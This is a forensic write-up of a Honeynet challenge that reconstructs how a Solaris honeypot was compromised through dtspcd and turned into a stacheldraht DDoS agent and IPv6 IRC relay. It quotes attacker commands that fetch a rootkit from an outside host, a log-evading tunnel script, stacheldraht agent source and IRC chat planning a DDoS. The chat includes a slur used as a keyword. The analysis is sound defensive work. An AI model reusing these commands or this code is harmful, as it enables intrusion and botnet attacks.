"This month's challenge is to analyze a successful compromise and the attacker's actions after it."
The Challenge: Members of the AT&T Mexico Honeynet captured a unique attack. As common, what is interesting is not how the attackers broke in, but what they did afterwards. Your mission is to analyze the network capture of the attacker's activity and decode the attacker's actions. There are two binary log files. Day1 captured the break in, Day3 captures some unique activity following the compromise. The honeypot in question is IP 192.168.100.28.
|
Answer - Now that IPv6 protocol has taken place all tools should be written to support and investigate even this protocol.
Answer - Ethereal 0.9.12 already support it even if it has some bugs.
|
|
First of all I verified what I have downloaded.
$ echo "79e5871791542c8f38dd9cee2b2bc317 day1.log.gz" > check.md5 $ echo "af8ab95f41530fe3561b506b422ed636 day3.log.gz" >> check.md5 $ md5sum -vc check.md5 day1.log.gz OK day3.log.gz OK |
$ mkdir tcpflow-day1 ; cd tcpflow-day1; tcpflow -r ../day1.log $ mkdir tcpflow-day3 ; cd tcpflow-day3; tcpflow -r ../day3.log |
Soon after I have used Snort 2.0 with the latest rules of signature (15th of May) using almost the default configuration file. The only difference was that I enabled all the groups of signatures to show up. In this way every SID could rise, even shellcode sginatures and ICMP traffic.
# snort -c ../rules/snort.conf -r day1.log -l /var/log/snort-2.0-DAY1.log/ # snort -c ../rules/snort.conf -r day3.log -l /var/log/snort-2.0-DAY3.log/ |
Below there are some statistics with some results:
(The arrows show the most sginificant things inside the boxes)
Snort processed 18843 packets.
Breakdown by protocol: Action Stats:
TCP: 12773 (67.786%) ALERTS: 2417
UDP: 3948 (20.952%) LOGGED: 2156
ICMP: 2122 (11.261%) PASSED: 0
ARP: 0 (0.000%)
EAPOL: 0 (0.000%)
IPv6: 0 (0.000%)
IPX: 0 (0.000%)
OTHER: 0 (0.000%)
===============================================================================
TCP Stream Reassembly Stats:
TCP Packets Used: 237 (1.258%)
Reconstructed Packets: 0 (0.000%)
Streams Reconstructed: 31
===============================================================================
# grep '\[\*\*\]' /var/log/output-snort-2.0.0-DAY1.log/alert |sort | uniq -c | sort -n
1 [**] [1:1790:2] CHAT IRC dns response [**]
1 [**] [1:615:3] SCAN SOCKS Proxy attempt [**]
1 [**] [1:645:3] SHELLCODE sparc NOOP [**] <------
4 [**] [1:618:2] SCAN Squid Proxy attempt [**]
4 [**] [1:620:2] SCAN Proxy (8080) attempt [**]
5 [**] [1:524:5] BAD TRAFFIC tcp port 0 traffic [**]
9 [**] [116:56:1] (snort_decoder): T/TCP Detected [**]
9 [**] [1:384:4] ICMP PING [**]
10 [**] [1:402:4] ICMP Destination Unreachable (Port Unreachable) [**]
201 [**] [1:368:4] ICMP PING BSDtype [**]
210 [**] [1:408:4] ICMP Echo Reply [**]
1692 [**] [1:1855:2] DDOS Stacheldraht agent->handler (skillz) [**] <------
|
Snort processed 123123 packets.
Breakdown by protocol: Action Stats:
TCP: 105973 (86.071%) ALERTS: 86656
UDP: 3896 (3.164%) LOGGED: 86657
ICMP: 7592 (6.166%) PASSED: 0
ARP: 0 (0.000%)
EAPOL: 0 (0.000%)
IPv6: 0 (0.000%)
IPX: 0 (0.000%)
OTHER: 5662 (4.599%) <------
===============================================================================
TCP Stream Reassembly Stats:
TCP Packets Used: 233 (0.189%)
Reconstructed Packets: 0 (0.000%)
Streams Reconstructed: 11
===============================================================================
# grep '\[\*\*\]' /var/log/output-snort-2.0.0-DAY3.log/alert |sort | uniq -c | sort -n
1 [**] [116:56:1] (snort_decoder): T/TCP Detected [**]
1 [**] [1:1257:4] DOS Winnuke attack [**]
1 [**] [1:1394:3] SHELLCODE x86 NOOP [**]
1 [**] [1:1790:2] CHAT IRC dns response [**]
1 [**] [1:485:2] ICMP Destination Unreachable (Communication Administratively Prohibited) [**]
5 [**] [1:1228:1] SCAN nmap XMAS [**]
8 [**] [1:621:1] SCAN FIN [**]
19 [**] [1:624:1] SCAN SYN FIN [**]
20 [**] [1:625:1] SCAN XMAS [**]
38 [**] [1:399:4] ICMP Destination Unreachable (Host Unreachable) [**]
89 [**] [1:368:4] ICMP PING BSDtype [**]
277 [**] [1:1856:2] DDOS Stacheldraht handler->agent (ficken) [**] <------
278 [**] [1:408:4] ICMP Echo Reply [**]
287 [**] [1:1854:2] DDOS Stacheldraht handler->agent (niggahbitch) [**] <------
662 [**] [1:404:4] ICMP Destination Unreachable (Protocol Unreachable) [**]
748 [**] [1:402:4] ICMP Destination Unreachable (Port Unreachable) [**]
1198 [**] [1:449:4] ICMP Time-To-Live Exceeded in Transit [**]
1796 [**] [1:1855:2] DDOS Stacheldraht agent->handler (skillz) [**]
2218 [**] [1:384:4] ICMP PING [**]
79008 [**] [1:241:2] DDOS shaft synflood [**] <------
|
As one can see tons of informations are included in the two boxes above.
We have a clear shellcode NOOP slide for SPARC, a clear reference to a DDOS tool, a few port scans and at last even the evidence of a
Distribuited DOS attack that I will discuss later.
|
|
MAC address: 08:00:20:d1:76:19 ---> SunMicro_d1:76:19. |
062.211.066.016.00020-192.168.100.028.32784: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), dynamically linked (uses shared libs), stripped 062.211.066.016.00020-192.168.100.028.32786: ELF 32-bit MSB executable, SPARC, version 1 (SYSV), dynamically linked (uses shared libs), stripped |
The exploit successfully used during the attack has a built-in command which runs on Unix machines and which is very useful to identify the platform and to gather a lot of informations: "uname -a"
This is the response given by the honeypot
#uname -a; SunOS zoberius 5.8 Generic_108528-09 sun4u sparc SUNW,Ultra-5_10 |
Since this "banner" could easily be faked (don't forget we are on a honeypot) I needed something more reliable: the NMAP OS Fingerprint database. This is included in Ettercap which has a fantastic utility to use it offline. Adding a few bash commands I found my suppositions consistent.
# ettercap -O -d -N -T day1.log > day1.log.OS.FINGERPRINTING
$ sort day1.log.OS.FINGERPRINTING | uniq | grep [a-z] | sed s/\-\-\>//g | sed "s/: NL :"//g | grep [0-9]
211.75.30.52 Linux 2.2.14 - 2.2.20
62.211.66.16 FreeBSD 4.5
66.28.103.87 Linux 2.4.xx
67.36.28.116 Windows 2000 / XP
80.117.14.44 Windows XP Pro
192.18.99.122 SunOS 5.8
203.239.31.60 Windows ME / 2000 / XP
203.69.233.93 Linux 2.2.14 - 2.2.20
24.167.44.129 Windows XP Pro, Windows 2000 Pro
61.219.90.180 Linux 2.4.xx
61.221.179.26 Linux 2.2.14 - 2.2.20
64.231.37.135 Windows 2000
192.168.100.28 Solaris 7 / 8 <-----
211.214.125.74 Windows ME / 2000 / XP
61.144.145.243 Windows 2000 Server - Windows XP SP1
64.160.228.206 Windows ME / 2000 / XP
67.195.152.135 Windows 2000 Pro
206.252.192.195 Cisco IOS
# ettercap -O -d -N -T day3.log > day3.log.OS.FINGERPRINTING
$ sort day3.log.OS.FINGERPRINTING | uniq | grep "^ -->" | grep -v ": $" | sed s/\-\-\>//g | sed "s/: NL :"//g
61.221.179.26 Linux 2.2.14 - 2.2.20
80.117.14.222 Windows XP Pro
192.114.144.52 Linux 2.4.xx
192.168.100.28 Solaris 8 <-----
195.130.233.20 Linux 2.4.xx
205.177.13.231 Linux 2.4.xx
213.157.130.12 Windows 2000
166.130.113.157 Windows 9x
206.252.192.195 Cisco IOS
|
Ok now I am pretty sure the honeypot box runs Solaris 5.8 as operating system.
|
|
Solaris8 Sparc was remotely compromised with the dtspcd exploit.
The attack originally came from the IP address: 61.219.90.180 and was originated the 29 of November 2002
|
|
The machine which runs the attack seems to be a Linux box (61.219.90.180 - Linux 2.4.xx)
After having succeded in the attack and having checked the presence of the BackDoor Shell (BD PID(s): 1773) the attacker uses one FTP server to download Solaris binaries or shell scripts.wget dlp solbnc ipv6sun
Soon after the attacker downloads and installs a Solaris rootkit which can be found here (sol.tar.gz)
# ./wget http://62.211.66.53/bobzz/sol.tar.gz |
Then he/she cleans the Logs and patches the Solaris box using these patches 111085-02.zip and 108949-07.zip to make the box unvulenerable.
At last he/starts the PsyBNC IRC tool (psy.tar)
# ./startbnc
.-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,----.,----.,-. ,-.,---.,--. ,-.,----.
| O || ,-' \ \/ / | o || \| || ,--'
| _/ _\ \ \ / | o< | |\ || |__
|_| |____/ |__| |___||_| \_| \___|
Version 2.2.1 (c) 1999-2000
the most psychoid
and the cool lam3rz Group IRCnet
`-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-'
Configuration File: psybnc.conf
No logfile specified, logging to log/psybnc.log
Listening on: 0.0.0.0 port 7000
psyBNC2.2.1-cBtITLdDMSNp started (PID 3262)
^[[1;37m*^[[0;37m psyBNC installed - loaded on reboot :>
# cd ..
# ./solbnc
|
This sequence taken from day1.log shows how the inetd daemon changed his behaviuor soon after the exploit. These packets were probably originated for the syslog server of the honeypot
WARNING Nov 29 09:56:18 inetd[167]: [ID 858011 daemon.warning] /usr/dt/bin/rpc.cmsd: Killed WARNING Nov 29 09:56:18 inetd[167]: [ID 858011 daemon.warning] /usr/sbin/sadmind: Killed ERROR Nov 29 09:56:19 inetd[1773]: [ID 801587 daemon.error] /tmp/x: No such file or directory |
!(((ipv6.addr eq 2001:750:2:0:202:a5ff:fef0:aac7) and (tcp.port eq 6667 and tcp.port eq 32780 )) or tcp.port eq 5001) and !((ip.addr eq 206.252.192.195 and ip.addr eq 192.168.100.28) and (tcp.port eq 5555 and tcp.port eq 32805)) and !((ip.addr eq 62.211.66.55 and ip.addr eq 192.168.100.28) and (tcp.port eq 80 and tcp.port eq 32806)) |
|
|
This file contains the full sequence of the attack. (attack-sequence.txt)
|
|
The honeypot has become an agent (AKA zombie) of a DDOS tool called "stacheldraht". Packets containg the string 'skillz' are used to comunicate with the handlers to see if it is reacheable and alive.
A complete analysis of this tool can be found at http://staff.washington.edu/dittrich/misc/stacheldraht.analysisInside day3.log I found a lot of occurences of other keywords which can be found in the communication between handlers and agents. These keywords taken from ICMP packets follow the decision of the client of starting the DOS attack.
277 ficken 287 niggahbitch 1796 skillz
A few words taken from Dittrich's analysis can clearly explain how the client works:
"Once the agent has determined a list of potential handlers, it then starts at the beginning of the list of handlers and sends an ICMP_ECHOREPLY packet with an ID field containing the value 666 and data field containing the string "skillz". If the master gets this packet, it sends back an ICMP_ECHOREPLY packet with an ID field containing the value 667 and data field containing the string "ficken". (It should be noted that there appears to be a bug that makes the handler and agent send out some large, e.g., >1000 byte, packets. The handler and agent continue periodically sending these 666|skillz / 667|ficken packets back and forth. This would be one way of detecting agents/masters by passively monitoring these ICMP packets.) "
Below there is an explanation of the network enviroment involved in the "Stacheldraht DDOS tool". Taken from Dittrich's analysis.
The network: client(s)-->handler(s)-->agent(s)-->victim(s)
------------------------------------------------------------
The stacheldraht network is made up of one or more handler programs
("mserv.c") and a large set of agents ("leaf/td.c"). The attacker uses
an encrypting "telnet alike" program to connect to and communicate
with the handlers ("telnetc/client.c"). A stacheldraht network would
look like this:
+--------+ +--------+
| client | | client |
+--------+ +--------+
| |
. . . --+------+---------------+------+----------------+-- . . .
| | |
| | |
+-----------+ +-----------+ +-----------+
| handler | | handler | | handler |
+-----------+ +-----------+ +-----------+
| | |
| | |
. . . ---+------+-----+------------+---+--------+------------+-+-- . . .
| | | | |
| | | | |
+-------+ +-------+ +-------+ +-------+ +-------+
| agent | | agent | | agent | | agent | | agent |
+-------+ +-------+ +-------+ +-------+ +-------+
|
This is an abstract of the function "checkalive" included in the file "leaf/td.c". As you can see here the honeypot mirrors perfectly this behaviour sending ICMP packets with the word 'skillz' and the ID field set to 0x1a0a which is 666. The function checkalive opens a RAW socket to wait for the connection/response from the handler (master server) then it sends a ICMP ECHO_REPLY packet with ID 666 and the word 'skillz' to wake-up a response from the server. This function belongs to a loop which is set to repeat every 61 seconds separating each server of 10 seconds.
int checkalive(char *server)
{
int listensocket;
struct ippkt packet;
int timeend;
/* setup new socket to wait for mserver reply */
listensocket=socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
fcntl(listensocket,F_SETFL,O_NONBLOCK);
/* contact the masterserver */
send_connect(inet_addr(server),666,"skillz");
/* wait for the reply , about 10 seconds */
timeend=time(NULL)+WAITTIMER;
while (time(NULL)<timeend) {
// bzero((void*)&packet,sizeof(struct ippkt));
memset((void*)&packet,0,sizeof(struct ippkt));
read(listensocket,(char*)&packet,sizeof(struct ippkt));
if (ntohs(packet.icmpi.icmp_hun.ih_idseq.icd_id)==667) {
serverworks=inet_addr(server);
close(listensocket);
return(1);
}
}
close(listensocket);
return(0);
}
|
|
|
The protocol used is IPv6. It was used to setup an IRC server over the IPv6 protocol.
These are some of the address involved:
2001:6b8:0:400::5d0e
2001:750:2:0:202:a5ff:fef0:aac7
This is the script downloaded (ipv6sun) by the attacker that enables the Tunnel over an IPv4 network.
#!/bin/sh unset HISTFILE clear echo "Inserisci il tuo ipv4"; read ipv4tuo; echo "..Okz" echo "Inserisci l'ipv4 del TunnelBroker"; read ipv4server; echo "..Okz" echo "tsrc ipv4tuo tdst ipv4server up" > /etc/hostname6.ip.tun0 echo "" echo "Inserisci il tuo IPV6"; read ipv6tuo; echo "..Okz" echo "Inserisci l'IPV6 dell'IRCServer"; read ipv6server; echo "..Okz" echo "addif ipv6tuo ipv6server up" >> /etc/hostname6.ip.tun0 echo "" echo "TermiNateD =)" echo "maphia-Groups r0x again" |
This is the full IRC session taken from day3.log using ethereal with the follwing filter:
(ipv6.addr eq 2001:750:2:0:202:a5ff:fef0:aac7 and ipv6.addr eq 2001:6b8:0:400::5d0e)
and (tcp.port eq 6667 and tcp.port eq 32780)
|
|
|
The attacker comes from Italy
This question was really easy for me since I am Italian too and I was able to follow all their IRC chats and to find even
evidence of what they were doing throughout what they were talking about!
For example looking at this sample taken from an IRC session I could find the agreement to start the DDOS attack:
:PaKi!~ChMoD@nova.tu.chiba-u.ac.jp PRIVMSG #bobz :ok un sec :bobz`!~ahaa@irc6.vhost.la PRIVMSG #bobz :apriamo sta dosnet o no? :D :CoC4|n4!~ChMoD@62.101.108.86 PRIVMSG #bobz :sisiis :CoC4|n4!~ChMoD@62.101.108.86 PRIVMSG #bobz :apriamo :|AnDr34z|!~OmBr4@vhost.irc6.server.tb.ngnet.it PRIVMSG #bobz :oggi siamo in giornata di take ;) :bobz`!~ahaa@irc6.vhost.la PRIVMSG #bobz :io apro quella ... là :Pp |